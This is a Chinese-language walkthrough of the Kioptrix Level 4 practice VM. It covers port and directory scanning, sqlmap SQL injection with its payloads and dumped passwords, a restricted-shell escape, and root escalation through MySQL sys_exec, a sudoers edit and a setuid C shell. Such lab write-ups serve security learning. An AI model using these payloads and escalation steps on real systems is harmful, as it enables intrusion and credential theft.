靶场搭建
下载:https://www.vulnhub.com/entry/kioptrix-level-13-4,25/
下载下来就是个虚拟磁盘,不能直接打开,需要新建虚拟机,通过虚拟磁盘打开,见文章:https://blog.csdn.net/qq_32261191/article/details/106408751
NAT模式IP地址:192.168.74.136
信息收集
nmap
┌──(root㉿kali)-[~]
└─# nmap -A 192.168.74.136
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-07 07:26 EDT
Nmap scan report for 192.168.74.136
Host is up (0.00041s latency).
Not shown: 566 closed tcp ports (reset), 430 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_ 2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 00:0C:29:D3:23:98 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Unix (Samba 3.0.28a)
| Computer name: Kioptrix4
| NetBIOS computer name:
| Domain name: localdomain
| FQDN: Kioptrix4.localdomain
|_ System time: 2024-04-07T15:27:02-04:00
|_clock-skew: mean: 10h00m02s, deviation: 2h49m43s, median: 8h00m01s
TRACEROUTE
HOP RTT ADDRESS
1 0.41 ms 192.168.74.136
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.79 seconds开了22、80、139、445
┌──(root㉿kali)-[~]
└─# nmap --script=vuln 192.168.74.136
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-07 07:33 EDT
Stats: 0:02:53 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.21% done; ETC: 07:36 (0:00:01 remaining)
Nmap scan report for 192.168.74.136
Host is up (0.00037s latency).
Not shown: 566 closed tcp ports (reset), 430 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.74.136
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.74.136:80/
| Form id: myusername
| Form action: checklogin.php
|
| Path: http://192.168.74.136:80/checklogin.php
| Form id:
| Form action: index.php
|
| Path: http://192.168.74.136:80/index.php
| Form id: myusername
|_ Form action: checklogin.php
|_http-trace: TRACE is enabled
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-enum:
| /database.sql: Possible database backup
| /icons/: Potentially interesting folder w/ directory listing
| /images/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) php/5.2.4-2ubuntu5.6 with suhosin-patch'
|_ /index/: Potentially interesting folder
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0C:29:D3:23:98 (VMware)
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)
Nmap done: 1 IP address (1 host up) scanned in 324.75 seconds漏洞监测发现有CSRF和数据库备份文件、以及一个不是很关键的慢速Dos攻击。
dirsearch
┌──(root㉿kali)-[~]
└─# dirsearch -u 192.168.74.136
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/reports/_192.168.74.136/_24-04-07_07-32-38.txt
Target: http://192.168.74.136/
[07:32:38] Starting:
[07:32:41] 403 - 332B - /.ht_wsr.txt
[07:32:41] 403 - 335B - /.htaccess.bak1
[07:32:41] 403 - 335B - /.htaccess.orig
[07:32:41] 403 - 335B - /.htaccess.save
[07:32:41] 403 - 336B - /.htaccess_extra
[07:32:41] 403 - 333B - /.htaccess_sc
[07:32:41] 403 - 333B - /.htaccessBAK
[07:32:41] 403 - 334B - /.htaccessOLD2
[07:32:41] 403 - 335B - /.htaccess_orig
[07:32:41] 403 - 337B - /.htaccess.sample
[07:32:41] 403 - 326B - /.html
[07:32:41] 403 - 325B - /.htm
[07:32:41] 403 - 335B - /.htpasswd_test
[07:32:41] 403 - 333B - /.htaccessOLD
[07:32:41] 403 - 331B - /.htpasswds
[07:32:41] 403 - 332B - /.httr-oauth
[07:33:04] 403 - 329B - /cgi-bin/
[07:33:05] 200 - 109B - /checklogin
[07:33:05] 200 - 109B - /checklogin.php
[07:33:09] 200 - 298B - /database.sql
[07:33:11] 403 - 325B - /doc/
[07:33:11] 403 - 340B - /doc/en/changes.html
[07:33:11] 403 - 329B - /doc/api/
[07:33:11] 403 - 340B - /doc/html/index.html
[07:33:11] 403 - 339B - /doc/stable.version
[07:33:20] 301 - 356B - /images -> http://192.168.74.136/images/
[07:33:20] 200 - 933B - /images/
[07:33:27] 302 - 0B - /logout.php -> index.php
[07:33:27] 302 - 0B - /logout -> index.php
[07:33:27] 302 - 0B - /logout/ -> index.php
[07:33:29] 302 - 220B - /member.php -> index.php
[07:33:29] 302 - 220B - /member -> index.php
[07:33:29] 302 - 220B - /member/admin.asp -> index.php
[07:33:29] 302 - 220B - /member/login.aspx -> index.php
[07:33:29] 302 - 220B - /member/login.jsp -> index.php
[07:33:29] 302 - 220B - /member/login.asp -> index.php
[07:33:29] 302 - 220B - /member/login.html -> index.php
[07:33:29] 302 - 220B - /member/login.js -> index.php
[07:33:29] 302 - 220B - /member/logon -> index.php
[07:33:29] 302 - 220B - /member/signin -> index.php
[07:33:29] 302 - 220B - /member/login -> index.php
[07:33:29] 302 - 220B - /member/login.php -> index.php
[07:33:29] 302 - 220B - /member/ -> index.php
[07:33:29] 302 - 220B - /member/login.rb -> index.php
[07:33:29] 302 - 220B - /member/login.py -> index.php
[07:33:49] 403 - 334B - /server-status
[07:33:49] 403 - 335B - /server-status/ 看到了数据库备份文件,比较重要
web信息
┌──(root㉿kali)-[~]
└─# whatweb http://192.168.74.136/
http://192.168.74.136/ [200 OK] Apache[2.2.8], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch], IP[192.168.74.136], PHP[5.2.4-2ubuntu5.6][Suhosin-Patch], PasswordField[mypassword], X-Powered-By[PHP/5.2.4-2ubuntu5.6]
汇总
- 数据库备份文件
- CSRF攻击
- SSH爆破
- Samba服务攻击
- Apache2.2.8
- PHP5.2.4
- Linux 2.6.9 - 2.6.33
漏洞利用
看到这种构成就尝试WEB层面的攻击了
数据库泄露
下载下来数据库看看先
CREATE TABLE `members` (
`id` int(4) NOT NULL auto_increment,
`username` varchar(65) NOT NULL default '',
`password` varchar(65) NOT NULL default '',
PRIMARY KEY (`id`)
) TYPE=MyISAM AUTO_INCREMENT=2 ;
--
-- Dumping data for table `members`
--
INSERT INTO `members` VALUES (1, 'john', '1234');看到了有个账号密码为john/1234
那就意味着我们可以登录到web页面进一步尝试,登陆看看先
账号密码错误,玩我哇?直接注入!
sql注入
sqlmap,启动!
┌──(root㉿kali)-[~]
└─# sqlmap -u http://192.168.74.136/checklogin.php --data="myusername=john&mypassword=123456&Submit=Login"
___
__H__
___ ___[,]_____ ___ ___ {1.8#stable}
|_ -| . [(] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 07:56:24 /2024-04-07/
[07:56:24] [INFO] testing connection to the target URL
[07:56:24] [INFO] checking if the target is protected by some kind of WAF/IPS
[07:56:24] [INFO] testing if the target URL content is stable
[07:56:25] [INFO] target URL content is stable
[07:56:25] [INFO] testing if POST parameter 'myusername' is dynamic
[07:56:25] [WARNING] POST parameter 'myusername' does not appear to be dynamic
[07:56:25] [WARNING] heuristic (basic) test shows that POST parameter 'myusername' might not be injectable
[07:56:25] [INFO] testing for SQL injection on POST parameter 'myusername'
[07:56:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[07:56:27] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[07:56:27] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[07:56:28] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[07:56:29] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[07:56:29] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[07:56:29] [INFO] testing 'Generic inline queries'
[07:56:29] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[07:56:29] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[07:56:29] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[07:56:29] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[07:56:29] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[07:56:29] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[07:56:29] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n]
[07:56:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[07:56:43] [WARNING] POST parameter 'myusername' does not seem to be injectable
[07:56:43] [INFO] testing if POST parameter 'mypassword' is dynamic
[07:56:43] [WARNING] POST parameter 'mypassword' does not appear to be dynamic
[07:56:43] [INFO] heuristic (basic) test shows that POST parameter 'mypassword' might be injectable (possible DBMS: 'MySQL')
[07:56:43] [INFO] testing for SQL injection on POST parameter 'mypassword'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[07:56:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[07:56:45] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[07:56:45] [INFO] testing 'Generic inline queries'
[07:56:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[07:56:46] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
got a 302 redirect to 'http://192.168.74.136/login_success.php?username=john'. Do you want to follow? [Y/n]
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N]
[07:56:48] [INFO] POST parameter 'mypassword' appears to be 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' injectable (with --code=302)
[07:56:48] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[07:56:48] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[07:56:48] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[07:56:48] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[07:56:48] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[07:56:48] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[07:56:48] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[07:56:48] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[07:56:48] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[07:56:48] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[07:56:48] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[07:56:48] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[07:56:48] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[07:56:48] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[07:56:48] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[07:56:48] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[07:56:48] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[07:56:48] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[07:56:48] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[07:56:48] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[07:56:48] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[07:56:48] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[07:56:48] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[07:56:48] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[07:56:48] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[07:56:48] [INFO] testing 'MySQL inline queries'
[07:56:48] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[07:56:48] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[07:56:48] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[07:56:48] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[07:56:48] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[07:56:48] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[07:56:48] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[07:56:58] [INFO] POST parameter 'mypassword' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[07:56:58] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[07:56:58] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[07:56:58] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[07:56:58] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[07:56:58] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[07:56:59] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[07:56:59] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[07:56:59] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[07:56:59] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[07:56:59] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[07:56:59] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[07:56:59] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
[07:56:59] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
[07:56:59] [INFO] checking if the injection point on POST parameter 'mypassword' is a false positive
sqlmap identified the following injection point(s) with a total of 346 HTTP(s) requests:
---
Parameter: mypassword (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: myusername=john&mypassword=-7436' OR 9853=9853#&Submit=Login
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: myusername=john&mypassword=123456' AND (SELECT 9393 FROM (SELECT(SLEEP(5)))iVay)-- jOgj&Submit=Login
---
[07:58:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP, PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[07:58:01] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.74.136'
[*] ending @ 07:58:01 /2024-04-07/发现了布尔盲注和时间盲注,直接读取数据库内容:sqlmap -u http://192.168.74.136/checklogin.php --data="myusername=john&mypassword=123456&Submit=Login" --dbs
[*] information_schema
[*] members
[*] mysql直接脱裤
┌──(root㉿kali)-[~]
└─# sqlmap -u http://192.168.74.136/checklogin.php --data="myusername=john&mypassword=123456&Submit=Login" --dump
___
__H__
___ ___[']_____ ___ ___ {1.8#stable}
|_ -| . ["] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 08:03:52 /2024-04-07/
[08:03:52] [INFO] resuming back-end DBMS 'mysql'
[08:03:52] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: myusername=john&mypassword=-7436' OR 9853=9853#&Submit=Login
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: myusername=john&mypassword=123456' AND (SELECT 9393 FROM (SELECT(SLEEP(5)))iVay)-- jOgj&Submit=Login
---
[08:03:52] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[08:03:52] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[08:03:52] [INFO] fetching current database
[08:03:52] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[08:03:52] [INFO] retrieved:
got a 302 redirect to 'http://192.168.74.136/login_success.php?username=john'. Do you want to follow? [Y/n]
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N]
members
[08:04:01] [INFO] fetching tables for database: 'members'
[08:04:01] [INFO] fetching number of tables for database 'members'
[08:04:01] [INFO] resumed: 1
[08:04:01] [INFO] resumed: members
[08:04:01] [INFO] fetching columns for table 'members' in database 'members'
[08:04:01] [INFO] retrieved: 3
[08:04:01] [INFO] retrieved: id
[08:04:01] [INFO] retrieved: username
[08:04:02] [INFO] retrieved: password
[08:04:02] [INFO] fetching entries for table 'members' in database 'members'
[08:04:02] [INFO] fetching number of entries for table 'members' in database 'members'
[08:04:02] [INFO] retrieved: 2
[08:04:02] [INFO] retrieved: 1
[08:04:02] [INFO] retrieved: MyNameIsJohn
[08:04:03] [INFO] retrieved: john
[08:04:04] [INFO] retrieved: 2
[08:04:04] [INFO] retrieved: ADGAdsafdfwt4gadfga==
[08:04:05] [INFO] retrieved: robert
Database: members
Table: members
[2 entries]
+----+-----------------------+----------+
| id | password | username |
+----+-----------------------+----------+
| 1 | MyNameIsJohn | john |
| 2 | ADGAdsafdfwt4gadfga== | robert |
+----+-----------------------+----------+
[08:04:06] [INFO] table 'members.members' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.74.136/dump/members/members.csv'
[08:04:06] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.74.136'
[*] ending @ 08:04:06 /2024-04-07/拿到账号密码,登录一下,登陆成功但是屁也没有
那就ssh看看能不能连上呢?
ssh
┌──(root㉿kali)-[~]
└─# ssh -oHostKeyAlgorithms=+ssh-dss john@192.168.74.136
The authenticity of host '192.168.74.136 (192.168.74.136)' can't be established.
DSA key fingerprint is SHA256:l2Z9xv+mXqcandVHZntyNeV1loP8XoFca+R/2VbroAw.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.74.136' (DSA) to the list of known hosts.
john@192.168.74.136's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ 进去了,但是一定要注意要添加-oHostKeyAlgorithms=+ssh-dss这个参数!因为默认的ssh连接不支持DSS的加密方式,添加参数才能连接上去!
但是连ls都执行不了,原来是一个受限制的shell
受限制的shell以及绕过方法:https://www.aldeid.com/wiki/Lshell
需要绕过到正常的交互式shell中
john:~$ echo os.system('/bin/bash')
john@Kioptrix4:~$ whoami
john拿到了正常的shell,但是仍然是低权限
接下来就要想办法提权了
他的网站需要与数据库进行交互,如果数据库有root权限的话也许能进行提权,查看一下呢?
john@Kioptrix4:~$ ps -aux | grep mysql
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
root 4419 0.0 0.1 1772 528 ? S 15:20 0:00 /bin/sh /usr/bin/mysqld_safe
root 4461 0.0 3.3 127224 17304 ? Sl 15:20 0:01 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=root --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3
root 4463 0.0 0.1 1700 556 ? S 15:20 0:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
john 4911 0.0 0.1 3004 756 pts/0 R+ 16:43 0:00 grep mysql非常好,我们看到数据库是root权限运行的,那么我们尝试进行提权
提权
尝试登录数据库,可以尝试空密码、已获得的密码、去网站配置文件找密码或者干脆爆破
因为是本地,尝试下空密码
john@Kioptrix4:~$ mysql -u root -h localhost
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 4918
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> 直接进来噜
修改sudoers文件的权限
mysql> SELECT sys_exec('chown john:john /etc/sudoers');
+------------------------------------------+
| sys_exec('chown john:john /etc/sudoers') |
+------------------------------------------+
| NULL |
+------------------------------------------+
1 row in set (0.00 sec)将john账号添加至sudoer中
john@Kioptrix4:~$ chmod 777 /etc/sudoers
john@Kioptrix4:~$ vim /etc/sudoers
# /etc/sudoers
#
# This file MUST be edited with the 'visudo' command as root.
#
# See the man page for details on how to write a sudoers file.
#
Defaults env_reset
# Host alias specification
# User alias specification
# Cmnd alias specification
# User privilege specification
root ALL=(ALL) ALL
john ALL=NOPASSWD :ALL
# Uncomment to allow members of group sudo to not need a password
# (Note that later entries override this, so you might need to move
# it further down)
# %sudo ALL=NOPASSWD: ALL
# Members of the admin group may gain root privileges
%admin ALL=(ALL) ALL这样sudo切换root账号不需要输入密码就行
保存后还要将权限改回去
john@Kioptrix4:~$ chmod 0440 /etc/sudoersmysql> select sys_exec('chown root:root /etc/sudoers');
+------------------------------------------+
| sys_exec('chown root:root /etc/sudoers') |
+------------------------------------------+
| NULL |
+------------------------------------------+
1 row in set (0.00 sec)
mysql> exit
Byejohn@Kioptrix4:~$ sudo su
root@Kioptrix4:/home/john# whoami
root拿到root权限!
还有一个哥们用的C语言写的程序,进行提权,通过上传编译后的脚本,通过mysql的root权限运行拿到bash。
下面是C语言的源代码
#include <unistd.h>
int main()
{
// 设置实际用户ID、有效用户ID和保存的用户ID为0,即root用户
setresuid(0, 0, 0);
// 设置实际组ID、有效组ID和保存的组ID为0,即root用户所在的组
setresgid(0, 0, 0);
// 调用system函数执行/bin/bash命令,启动一个交互式的bash shell
system("/bin/bash");
return 0;
}通过设置编译文件777权限,使用john运行exploit,就可以拿到root权限
mysql> SELECT sys_exec('chmod +s,a+rwx /tmp/exploit');小结
通过登录接口进行sql注入
获取账号密码后通过dds加密方式登录ssh
绕过垃圾shell,通过root权限进行提权
我还尝试用metasploit中的ssh_login登录后返回session,在进行udf提权,但是ssh加密方式在这个模块中不支持。于是想要尝试反弹shell进行,但是bash没办法反弹,知道原因的老哥踢我